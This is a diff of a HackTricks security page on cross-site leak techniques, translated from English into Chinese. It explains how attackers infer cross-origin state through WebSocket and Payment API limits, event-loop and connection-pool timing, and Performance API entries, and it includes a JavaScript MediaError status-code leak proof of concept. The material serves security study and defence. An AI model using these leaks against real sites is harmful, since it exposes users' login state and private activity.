+- **Code Example**: `任何监听所有 postMessages 的代码。`
 
-Applications frequently utilize [`postMessage` broadcasts](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) to communicate across different origins. However, this method can inadvertently expose **sensitive information** if the `targetOrigin` parameter is not properly specified, allowing any window to receive the messages. Furthermore, the mere act of receiving a message can act as an **oracle**; for instance, certain messages might only be sent to users who are logged in. Therefore, the presence or absence of these messages can reveal information about the user's state or identity, such as whether they are authenticated or not.
+应用程序经常利用 [`postMessage` 广播](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage) 在不同源之间进行通信。然而，如果 `targetOrigin` 参数未正确指定，此方法可能会无意中暴露**敏感信息**，允许任何窗口接收消息。此外，接收消息的行为本身可以充当**oracle**；例如，某些消息可能仅发送给已登录的用户。因此，这些消息的存在或缺失可以揭示有关用户状态或身份的信息，例如他们是否经过身份验证。
 
 <figure><img src="../images/image (3) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建和**自动化工作流**，由世界上**最先进**的社区工具提供支持。\
+今天就获取访问权限：
 
 {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
 
@@ -221,464 +217,461 @@ Get Access Today:
 ### WebSocket API
 
 - **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: API Usage
+- **Detectable Difference**: API 使用
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.1)
-- **Summary**: Exhausting the WebSocket connection limit leaks the number of WebSocket connections of a cross-origin page.
+- **Summary**: 耗尽 WebSocket 连接限制会泄露跨源页面的 WebSocket 连接数量。
 - **Code Example**: [https://xsinator.com/testing.html#WebSocket%20Leak%20(FF)](<https://xsinator.com/testing.html#WebSocket%20Leak%20(FF)>), [https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)](<https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)>)
 
-It is possible to identify if, and how many, **WebSocket connections a target page uses**. It allows an attacker to detect application states and leak information tied to the number of WebSocket connections.
+可以识别目标页面使用了多少个**WebSocket 连接**。这使攻击者能够检测应用程序状态并泄露与 WebSocket 连接数量相关的信息。
 
-If one **origin** uses the **maximum amount of WebSocket** connection objects, regardless of their connections state, the creation of **new objects will result in JavaScript exceptions**. To execute this attack, the attacker website opens the target website in a pop-up or iframe and then, after the target web has been loaded, attempts to create the maximum number of WebSockets connections possible. The **number of thrown exceptions** is the **number of WebSocket connections used by the target website** window.
+如果一个**源**使用了**最大数量的 WebSocket** 连接对象，无论其连接状态如何，创建**新对象将导致 JavaScript 异常**。要执行此攻击，攻击者网站在弹出窗口或 iframe 中打开目标网站，然后在目标网页加载后，尝试创建尽可能多的 WebSocket 连接。**抛出的异常数量**就是目标网站窗口使用的**WebSocket 连接数量**。
 
 ### Payment API
 
 - **Inclusion Methods**: Frames, Pop-ups
-- **Detectable Difference**: API Usage
+- **Detectable Difference**: API 使用
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.1)
-- **Summary**: Detect Payment Request because only one can be active at a time.
+- **Summary**: 检测支付请求，因为一次只能激活一个。
 - **Code Example**: [https://xsinator.com/testing.html#Payment%20API%20Leak](https://xsinator.com/testing.html#Payment%20API%20Leak)
 
-This XS-Leak enables an attacker to **detect when a cross-origin page initiates a payment request**.
+此 XS-Leak 使攻击者能够**检测跨源页面何时发起支付请求**。
 
-Because **only one request payment can be active** at the same time, if the target website is using the Payment Request API, any f**urther attempts to show use this API will fail**, and cause a **JavaScript exception**. The attacker can exploit this by **periodically attempting to show the Payment API UI**. If one attempt causes an exception, the target website is currently using it. The attacker can hide these periodical attempts by immediately closing the UI after creation.
+因为**一次只能激活一个支付请求**，如果目标网站正在使用支付请求 API，任何进一步尝试使用此 API 的请求将失败，并导致**JavaScript 异常**。攻击者可以通过**定期尝试显示支付 API UI**来利用这一点。如果一次尝试导致异常，则目标网站当前正在使用它。攻击者可以通过在创建后立即关闭 UI 来隐藏这些定期尝试。
 
 ### Timing the Event Loop <a href="#timing-the-event-loop" id="timing-the-event-loop"></a>
 
 - **Inclusion Methods**:
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
+- **Detectable Difference**: 定时（通常由于页面内容、状态码）
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#timing-the-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#timing-the-event-loop)
-- **Summary:** Measure execution time of a web abusing the single-threaded JS event loop.
+- **Summary:** 测量网络执行时间，利用单线程 JS 事件循环。
 - **Code Example**:
 
 {{#ref}}
 xs-search/event-loop-blocking-+-lazy-images.md
 {{#endref}}
 
-JavaScript operates on a [single-threaded event loop](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop) concurrency model, signifying that **it can only execute one task at a time**. This characteristic can be exploited to gauge **how long code from a different origin takes to execute**. An attacker can measure the execution time of their own code in the event loop by continuously dispatching events with fixed properties. These events will be processed when the event pool is empty. If other origins are also dispatching events to the same pool, an **attacker can infer the time it takes for these external events to execute by observing delays in the execution of their own tasks**. This method of monitoring the event loop for delays can reveal the execution time of code from different origins, potentially exposing sensitive information.
+JavaScript 在 [单线程事件循环](https://developer.mozilla.org/en-US/docs/Web/JavaScript/EventLoop) 并发模型上运行，这意味着**它一次只能执行一个任务**。这一特性可以被利用来评估**来自不同源的代码执行所需的时间**。攻击者可以通过不断调度具有固定属性的事件来测量其代码在事件循环中的执行时间。这些事件将在事件池为空时被处理。如果其他源也在向同一池调度事件，攻击者可以通过观察自己任务执行的延迟来推断这些外部事件的执行时间。这种监控事件循环延迟的方法可以揭示来自不同源的代码的执行时间，可能会暴露敏感信息。
 
 > [!WARNING]
-> In an execution timing it's possible to **eliminate** **network factors** to obtain **more precise measurements**. For example, by loading the resources used by the page before loading it.
+> 在执行定时中，可以**消除** **网络因素**以获得**更精确的测量**。例如，通过在加载页面之前加载页面使用的资源。
 
 ### Busy Event Loop <a href="#busy-event-loop" id="busy-event-loop"></a>
 
 - **Inclusion Methods**:
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
+- **Detectable Difference**: 定时（通常由于页面内容、状态码）
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop](https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop)
-- **Summary:** One method to measure the execution time of a web operation involves intentionally blocking the event loop of a thread and then timing **how long it takes for the event loop to become available again**. By inserting a blocking operation (such as a long computation or a synchronous API call) into the event loop, and monitoring the time it takes for subsequent code to begin execution, one can infer the duration of the tasks that were executing in the event loop during the blocking period. This technique leverages the single-threaded nature of JavaScript's event loop, where tasks are executed sequentially, and can provide insights into the performance or behavior of other operations sharing the same thread.
+- **Summary:** 一种测量网络操作执行时间的方法是故意阻塞线程的事件循环，然后计时**事件循环再次可用所需的时间**。通过在事件循环中插入阻塞操作（例如长时间计算或同步 API 调用），并监控后续代码开始执行所需的时间，可以推断出在阻塞期间事件循环中执行的任务的持续时间。这种技术利用了 JavaScript 事件循环的单线程特性，其中任务是顺序执行的，并且可以提供有关共享同一线程的其他操作的性能或行为的见解。
 - **Code Example**:
 
-A significant advantage of the technique of measuring execution time by locking the event loop is its potential to circumvent **Site Isolation**. **Site Isolation** is a security feature that separates different websites into separate processes, aiming to prevent malicious sites from directly accessing sensitive data from other sites. However, by influencing the execution timing of another origin through the shared event loop, an attacker can indirectly extract information about that origin's activities. This method does not rely on direct access to the other origin's data but rather observes the impact of that origin's activities on the shared event loop, thus evading the protective barriers established by **Site Isolation**.
+通过锁定事件循环来测量执行时间的技术的一个显著优势是其潜在的规避**站点隔离**。**站点隔离**是一种安全功能，将不同网站分隔到不同的进程中，旨在防止恶意网站直接访问其他网站的敏感数据。然而，通过通过共享事件循环影响另一个源的执行时机，攻击者可以间接提取有关该源活动的信息。这种方法不依赖于直接访问其他源的数据，而是观察该源活动对共享事件循环的影响，从而规避**站点隔离**建立的保护屏障。
 
 > [!WARNING]
-> In an execution timing it's possible to **eliminate** **network factors** to obtain **more precise measurements**. For example, by loading the resources used by the page before loading it.
+> 在执行定时中，可以**消除** **网络因素**以获得**更精确的测量**。例如，通过在加载页面之前加载页面使用的资源。
 
 ### Connection Pool
 
-- **Inclusion Methods**: JavaScript Requests
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
+- **Inclusion Methods**: JavaScript 请求
+- **Detectable Difference**: 定时（通常由于页面内容、状态码）
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
-- **Summary:** An attacker could lock all the sockets except 1, load the target web and at the same time load another page, the time until the last page is starting to load is the time the target page took to load.
+- **Summary:** 攻击者可以锁定所有套接字，除了 1 个，加载目标网页，同时加载另一个页面，最后一个页面开始加载的时间就是目标页面加载所需的时间。
 - **Code Example**:
 
 {{#ref}}
 xs-search/connection-pool-example.md
 {{#endref}}
 
-Browsers utilize sockets for server communication, but due to the limited resources of the operating system and hardware, **browsers are compelled to impose a limit** on the number of concurrent sockets. Attackers can exploit this limitation through the following steps:
+浏览器利用套接字进行服务器通信，但由于操作系统和硬件的资源有限，**浏览器被迫对**并发套接字的数量施加限制。攻击者可以通过以下步骤利用这一限制：
 
-1. Ascertain the browser's socket limit, for instance, 256 global sockets.
-2. Occupy 255 sockets for an extended duration by initiating 255 requests to various hosts, designed to keep the connections open without completing.
-3. Employ the 256th socket to send a request to the target page.
-4. Attempt a 257th request to a different host. Given that all sockets are in use (as per steps 2 and 3), this request will be queued until a socket becomes available. The delay before this request proceeds provides the attacker with timing information about the network activity related to the 256th socket (the target page's socket). This inference is possible because the 255 sockets from step 2 are still engaged, implying that any newly available socket must be the one released from step 3. The time taken for the 256th socket to become available is thus directly linked to the time required for the request to the target page to complete.
+1. 确定浏览器的套接字限制，例如，256 个全局套接字。
+2. 通过向不同主机发起 255 个请求，长时间占用 255 个套接字，旨在保持连接开放而不完成。
+3. 使用第 256 个套接字向目标页面发送请求。
+4. 尝试向不同主机发起第 257 个请求。由于所有套接字都在使用中（根据步骤 2 和 3），此请求将被排队，直到有套接字可用。此请求进行之前的延迟为攻击者提供了与第 256 个套接字（目标页面的套接字）相关的网络活动的定时信息。这种推断是可能的，因为步骤 2 中的 255 个套接字仍在使用，这意味着任何新可用的套接字必须是从步骤 3 中释放的。第 256 个套接字变为可用所需的时间因此直接与请求目标页面完成所需的时间相关联。
 
-For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
+有关更多信息： [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)
 
 ### Connection Pool by Destination
 
-- **Inclusion Methods**: JavaScript Requests
-- **Detectable Difference**: Timing (generally due to Page Content, Status Code)
+- **Inclusion Methods**: JavaScript 请求
+- **Detectable Difference**: 定时（通常由于页面内容、状态码）
 - **More info**:
-- **Summary:** It's like the previous technique but instead of using all the sockets, Google **Chrome** puts a limit of **6 concurrent request to the same origin**. If we **block 5** and then **launch a 6th** request we can **time** it and if we managed to make the **victim page send** more **requests** to the same endpoint to detect a **status** of the **page**, the **6th request** will take **longer** and we can detect it.
+- **Summary:** 这与前一种技术类似，但 Google **Chrome** 对**同一源的并发请求**设置了**6 个限制**。如果我们**阻塞 5**，然后**发起第 6 个**请求，我们可以**计时**，如果我们设法让**受害者页面发送**更多**请求**到同一端点以检测页面的**状态**，第 **6 个请求**将需要**更长时间**，我们可以检测到。
 
 ## Performance API Techniques
 
-The [`Performance API`](https://developer.mozilla.org/en-US/docs/Web/API/Performance) offers insights into the performance metrics of web applications, further enriched by the [`Resource Timing API`](https://developer.mozilla.org/en-US/docs/Web/API/Resource_Timing_API). The Resource Timing API enables the monitoring of detailed network request timings, such as the duration of the requests. Notably, when servers include the `Timing-Allow-Origin: *` header in their responses, additional data like the transfer size and domain lookup time becomes available.
+[`Performance API`](https://developer.mozilla.org/en-US/docs/Web/API/Performance) 提供了对 Web 应用程序性能指标的洞察，进一步通过 [`Resource Timing API`](https://developer.mozilla.org/en-US/docs/Web/API/Resource_Timing_API) 得到增强。资源计时 API 使监控详细的网络请求时序成为可能，例如请求的持续时间。值得注意的是，当服务器在其响应中包含 `Timing-Allow-Origin: *` 头时，诸如传输大小和域查找时间等附加数据将变得可用。
 
-This wealth of data can be retrieved via methods like [`performance.getEntries`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries) or [`performance.getEntriesByName`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntriesByName), providing a comprehensive view of performance-related information. Additionally, the API facilitates the measurement of execution times by calculating the difference between timestamps obtained from [`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now). However, it's worth noting that for certain operations in browsers like Chrome, the precision of `performance.now()` may be limited to milliseconds, which could affect the granularity of timing measurements.
+通过 [`performance.getEntries`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries) 或 [`performance.getEntriesByName`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntriesByName) 等方法，可以检索到这一丰富的数据，提供全面的性能相关信息。此外，API 通过计算从 [`performance.now()`](https://developer.mozilla.org/en-US/docs/Web/API/Performance/now) 获取的时间戳之间的差异来测量执行时间。然而，值得注意的是，对于 Chrome 等浏览器中的某些操作，`performance.now()` 的精度可能仅限于毫秒，这可能会影响定时测量的粒度。
 
-Beyond timing measurements, the Performance API can be leveraged for security-related insights. For instance, the presence or absence of pages in the `performance` object in Chrome can indicate the application of `X-Frame-Options`. Specifically, if a page is blocked from rendering in a frame due to `X-Frame-Options`, it will not be recorded in the `performance` object, providing a subtle clue about the page's framing policies.
+除了定时测量外，性能 API 还可以用于安全相关的洞察。例如，Chrome 中 `performance` 对象中页面的存在或缺失可以指示 `X-Frame-Options` 的应用。具体而言，如果由于 `X-Frame-Options` 而阻止页面在框架中呈现，则不会在 `performance` 对象中记录该页面，从而提供有关页面框架策略的微妙线索。
 
 ### Error Leak
 
-- **Inclusion Methods**: Frames, HTML Elements
-- **Detectable Difference**: Status Code
+- **Inclusion Methods**: Frames, HTML 元素
+- **Detectable Difference**: 状态码
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** A request that results in errors will not create a resource timing entry.
+- **Summary:** 结果为错误的请求不会创建资源计时条目。
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20Error%20Leak](https://xsinator.com/testing.html#Performance%20API%20Error%20Leak)
 
-It is possible to **differentiate between HTTP response status codes** because requests that lead to an **error** do **not create a performance entry**.
+可以**区分 HTTP 响应状态码**，因为导致**错误**的请求**不会创建性能条目**。
 
 ### Style Reload Error
 
-- **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Status Code
+- **Inclusion Methods**: HTML 元素
+- **Detectable Difference**: 状态码
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** Due to a browser bug, requests that result in errors are loaded twice.
+- **Summary:** 由于浏览器错误，导致错误的请求被加载两次。
 - **Code Example**: [https://xsinator.com/testing.html#Style%20Reload%20Error%20Leak](https://xsinator.com/testing.html#Style%20Reload%20Error%20Leak)
 
-In the previous technique it was also identified two cases where browser bugs in GC lead to **resources being loaded twice when they fail to load**. This will result in multiple entries in the Performance API and can thus be detected.
+在前一种技术中，还识别出浏览器中的两个错误案例，导致**资源在加载失败时被加载两次**。这将导致性能 API 中出现多个条目，因此可以被检测到。
 
 ### Request Merging Error
 
-- **Inclusion Methods**: HTML Elements
-- **Detectable Difference**: Status Code
+- **Inclusion Methods**: HTML 元素
+- **Detectable Difference**: 状态码
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** Requests that result in an error can not be merged.
+- **Summary:** 导致错误的请求无法合并。
 - **Code Example**: [https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak)
 
-The technique was found in a table in the mentioned paper but no description of the technique was found on it. However, you can find the source code checking for it in [https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak)
+该技术在提到的论文中的表格中被发现，但没有找到该技术的描述。然而，您可以在 [https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak](https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak) 中检查源代码。
 
 ### Empty Page Leak
 
 - **Inclusion Methods**: Frames
-- **Detectable Difference**: Page Content
+- **Detectable Difference**: 页面内容
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** Empty responses do not create resource timing entries.
+- **Summary:** 空响应不会创建资源计时条目。
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20Empty%20Page%20Leak](https://xsinator.com/testing.html#Performance%20API%20Empty%20Page%20Leak)
 
-An attacker can detect if a request resulted in an empty HTTP response body because e**mpty pages do not create a performance entry in some browsers**.
+攻击者可以检测请求是否导致空 HTTP 响应体，因为**空页面在某些浏览器中不会创建性能条目**。
 
 ### **XSS-Auditor Leak**
 
 - **Inclusion Methods**: Frames
-- **Detectable Difference**: Page Content
+- **Detectable Difference**: 页面内容
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** Using the XSS Auditor in Security Assertions, attackers can detect specific webpage elements by observing alterations in responses when crafted payloads trigger the auditor's filtering mechanism.
+- **Summary:** 在安全声明中使用 XSS 审计器，攻击者可以通过观察在构造有效负载触发审计器过滤机制时响应的变化来检测特定网页元素。
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak](https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak)
 
-In Security Assertions (SA), the XSS Auditor, originally intended to prevent Cross-Site Scripting (XSS) attacks, can paradoxically be exploited to leak sensitive information. Although this built-in feature was removed from Google Chrome (GC), it's still present in SA. In 2013, Braun and Heiderich demonstrated that the XSS Auditor could inadvertently block legitimate scripts, leading to false positives. Building on this, researchers developed techniques to extract information and detect specific content on cross-origin pages, a concept known as XS-Leaks, initially reported by Terada and elaborated by Heyes in a blog post. Although these techniques were specific to the XSS Auditor in GC, it was discovered that in SA, pages blocked by the XSS Auditor do not generate entries in the Performance API, revealing a method through which sensitive information might still be leaked.
+在安全声明 (SA) 中，XSS 审计器最初旨在防止跨站脚本 (XSS) 攻击，但可以悖论地被利用来泄露敏感信息。尽管此内置功能已从 Google Chrome (GC) 中删除，但在 SA 中仍然存在。2013 年，Braun 和 Heiderich 证明 XSS 审计器可能会意外阻止合法脚本，导致误报。在此基础上，研究人员开发了提取信息和检测跨源页面特定内容的技术，这一概念被称为 XS-Leaks，最初由 Terada 报告，并在 Heyes 的博客文章中详细阐述。尽管这些技术特定于 GC 中的 XSS 审计器，但发现 SA 中被 XSS 审计器阻止的页面不会在性能 API 中生成条目，从而揭示了一种可能仍然泄露敏感信息的方法。
 
 ### X-Frame Leak
 
 - **Inclusion Methods**: Frames
-- **Detectable Difference**: Header
+- **Detectable Difference**: 头部
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2), [https://xsleaks.github.io/xsleaks/examples/x-frame/index.html](https://xsleaks.github.io/xsleaks/examples/x-frame/index.html), [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-x-frame-options](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-x-frame-options)
-- **Summary:** Resource with X-Frame-Options header does not create resource timing entry.
+- **Summary:** 带有 X-Frame-Options 头的资源不会创建资源计时条目。
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak](https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak)
 
-If a page is **not allowed** to be **rendered** in an **iframe** it does **not create a performance entry**. As a result, an attacker can detect the response header **`X-Frame-Options`**.\
-Same happens if you use an **embed** **tag.**
+如果页面**不允许**在**iframe**中**呈现**，则不会创建性能条目。因此，攻击者可以检测响应头**`X-Frame-Options`**。\
+使用**embed** **标签**时也是如此。
 
 ### Download Detection
 
 - **Inclusion Methods**: Frames
-- **Detectable Difference**: Header
+- **Detectable Difference**: 头部
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** Downloads do not create resource timing entries in the Performance API.
+- **Summary:** 下载不会在性能 API 中创建资源计时条目。
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20Download%20Detection](https://xsinator.com/testing.html#Performance%20API%20Download%20Detection)
 
-Similar, to the XS-Leak described, a **resource that is downloaded** because of the ContentDisposition header, also does **not create a performance entry**. This technique works in all major browsers.
+与描述的 XS-Leak 类似，由于 ContentDisposition 头，**下载的资源**也**不会创建性能条目**。此技术在所有主要浏览器中均有效。
 
 ### Redirect Start Leak
 
 - **Inclusion Methods**: Frames
-- **Detectable Difference**: Redirect
+- **Detectable Difference**: 重定向
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** Resource timing entry leaks the start time of a redirect.
+- **Summary:** 资源计时条目泄露重定向的开始时间。
 - **Code Example**: [https://xsinator.com/testing.html#Redirect%20Start%20Leak](https://xsinator.com/testing.html#Redirect%20Start%20Leak)
 
-We found one XS-Leak instance that abuses the behavior of some browsers which log too much information for cross-origin requests. The standard defines a subset of attributes that should be set to zero for cross-origin resources. However, in **SA** it is possible to detect if the user is **redirected** by the target page, by querying the **Performance API** and checking for the **redirectStart timing data**.
+我们发现一个 XS-Leak 实例，利用某些浏览器记录过多跨源请求信息的行为。标准定义了一组应为跨源资源设置为零的属性。然而，在**SA**中，可以通过查询**性能 API**并检查**redirectStart 计时数据**来检测用户是否被目标页面**重定向**。
 
 ### Duration Redirect Leak
 
 - **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Redirect
+- **Detectable Difference**: 重定向
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** The duration of timing entries is negative when a redirect occurs.
+- **Summary:** 当发生重定向时，计时条目的持续时间为负。
 - **Code Example**: [https://xsinator.com/testing.html#Duration%20Redirect%20Leak](https://xsinator.com/testing.html#Duration%20Redirect%20Leak)
 
-In GC, the **duration** for requests that result in a **redirect** is **negative** and can thus be **distinguished** from requests that do not result in a redirect.
+在 GC 中，导致**重定向**的请求的**持续时间**为**负**，因此可以与不导致重定向的请求**区分**开来。
 
 ### CORP Leak
 
 - **Inclusion Methods**: Frames
-- **Detectable Difference**: Header
+- **Detectable Difference**: 头部
 - **More info**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
-- **Summary:** Resource protected with CORP do not create resource timing entries.
+- **Summary:** 受 CORP 保护的资源不会创建资源计时条目。
 - **Code Example**: [https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak](https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak)
 
-In some cases, the **nextHopProtocol entry** can be used as a leak technique. In GC, when the **CORP header** is set, the nextHopProtocol will be **empty**. Note that SA will not create a performance entry at all for CORP-enabled resources.
+在某些情况下，**nextHopProtocol 条目**可以用作泄露技术。在 GC 中，当设置**CORP 头**时，nextHopProtocol 将是**空的**。请注意，SA 对于启用 CORP 的资源根本不会创建性能条目。
 
 ### Service Worker
 
 - **Inclusion Methods**: Frames
-- **Detectable Difference**: API Usage
+- **Detectable Difference**: API 使用
 - **More info**: [https://www.ndss-symposium.org/ndss-paper/awakening-the-webs-sleeper-agents-misusing-service-workers-for-privacy-leakage/](https://www.ndss-symposium.org/ndss-paper/awakening-the-webs-sleeper-agents-misusing-service-workers-for-privacy-leakage/)
-- **Summary:** Detect if a service worker is registered for a specific origin.
+- **Summary:** 检测特定源是否注册了服务工作者。
 - **Code Example**:
 
-Service workers are event-driven script contexts that run at an origin. They run in the background of a web page and can intercept, modify, and **cache resources** to create offline web application.\
-If a **resource cached** by a **service worker** is accessed via **iframe**, the resource will be **loaded from the service worker cache**.\
-To detect if the resource was **loaded from the service worker** cache the **Performance API** can be used.\
-This could also be done with a Timing attack (check the paper for more info).
+服务工作者是事件驱动的脚本上下文，在一个源上运行。它们在网页的后台运行，可以拦截、修改和**缓存资源**以创建离线 Web 应用程序。\
+如果通过**iframe**访问**服务工作者**缓存的**资源**，该资源将从**服务工作者缓存**中**加载**。\
+要检测资源是否**从服务工作者**缓存中加载，可以使用**性能 API**。\
+这也可以通过定时攻击来完成（有关更多信息，请查看论文）。
 
 ### Cache
 
 - **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Timing
+- **Detectable Difference**: 定时
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources)
-- **Summary:** It is possible to check if a resource was stored in the cache.
+- **Summary:** 可以检查资源是否存储在缓存中。
 - **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources), [https://xsinator.com/testing.html#Cache%20Leak%20(POST)](<https://xsinator.com/testing.html#Cache%20Leak%20(POST)>)
 
-Using the [Performance API](xs-search.md#performance-api) it's possible to check if a resource is cached.
+使用 [Performance API](xs-search.md#performance-api) 可以检查资源是否被缓存。
 
 ### Network Duration
 
 - **Inclusion Methods**: Fetch API
-- **Detectable Difference**: Page Content
+- **Detectable Difference**: 页面内容
 - **More info**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration)
-- **Summary:** It is possible to retrieve the network duration of a request from the `performance` API.
+- **Summary:** 可以从 `performance` API 中检索请求的网络持续时间。
 - **Code Example**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration)
 
 ## Error Messages Technique
 
 ### Media Error
 
-- **Inclusion Methods**: HTML Elements (Video, Audio)
-- **Detectable Difference**: Status Code
+- **Inclusion Methods**: HTML 元素 (视频, 音频)
+- **Detectable Difference**: 状态码
 - **More info**: [https://bugs.chromium.org/p/chromium/issues/detail?id=828265](https://bugs.chromium.org/p/chromium/issues/detail?id=828265)
-- **Summary:** In Firefox is possible to accurately leak a cross-origin request’s status code.
+- **Summary:** 在 Firefox 中，可以准确泄露跨源请求的状态码。
 - **Code Example**: [https://jsbin.com/nejatopusi/1/edit?html,css,js,output](https://jsbin.com/nejatopusi/1/edit?html,css,js,output)
-
 ```javascript
 // Code saved here in case it dissapear from the link
 // Based on MDN MediaError example: https://mdn.github.io/dom-examples/media/mediaerror/
 window.addEventListener("load", startup, false)
 function displayErrorMessage(msg) {
-  document.getElementById("log").innerHTML += msg
+document.getElementById("log").innerHTML += msg
 }
 
 function startup() {
-  let audioElement = document.getElementById("audio")
-  // "https://mdn.github.io/dom-examples/media/mediaerror/assets/good.mp3";
-  document.getElementById("startTest").addEventListener(
-    "click",
-    function () {
-      audioElement.src = document.getElementById("testUrl").value
-    },
-    false
-  )
-  // Create the event handler
-  var errHandler = function () {
-    let err = this.error
-    let message = err.message
-    let status = ""
+let audioElement = document.getElementById("audio")
+// "https://mdn.github.io/dom-examples/media/mediaerror/assets/good.mp3";
+document.getElementById("startTest").addEventListener(
+"click",
+function () {
+audioElement.src = document.getElementById("testUrl").value
+},
+false
+)
+// Create the event handler
+var errHandler = function () {
+let err = this.error
+let message = err.message
+let status = ""
 
-    // Chrome error.message when the request loads successfully: "DEMUXER_ERROR_COULD_NOT_OPEN: FFmpegDemuxer: open context failed"
-    // Firefox error.message when the request loads successfully: "Failed to init decoder"
-    if (
-      message.indexOf("DEMUXER_ERROR_COULD_NOT_OPEN") != -1 ||
-      message.indexOf("Failed to init decoder") != -1
-    ) {
-      status = "Success"
-    } else {
-      status = "Error"
-    }
-    displayErrorMessage(
-      "<strong>Status: " +
-        status +
-        "</strong> (Error code:" +
-        err.code +
-        " / Error Message: " +
-        err.message +
-        ")<br>"
-    )
-  }
-  audioElement.onerror = errHandler
+// Chrome error.message when the request loads successfully: "DEMUXER_ERROR_COULD_NOT_OPEN: FFmpegDemuxer: open context failed"
+// Firefox error.message when the request loads successfully: "Failed to init decoder"
+if (
+message.indexOf("DEMUXER_ERROR_COULD_NOT_OPEN") != -1 ||
+message.indexOf("Failed to init decoder") != -1
+) {
+status = "Success"
+} else {
+status = "Error"
+}
+displayErrorMessage(
+"<strong>Status: " +
+status +
+"</strong> (Error code:" +
+err.code +
+" / Error Message: " +
+err.message +
+")<br>"
+)
+}
+audioElement.onerror = errHandler
 }
 ```
+`MediaError` 接口的 message 属性通过一个独特的字符串唯一标识成功加载的资源。攻击者可以通过观察消息内容来利用此特性，从而推断跨源资源的响应状态。
 
-The `MediaError` interface's message property uniquely identifies resources that load successfully with a distinct string. An attacker can exploit this feature by observing the message content, thereby deducing the response status of a cross-origin resource.
+### CORS 错误
 
-### CORS Error
+- **包含方法**: Fetch API
+- **可检测差异**: Header
+- **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
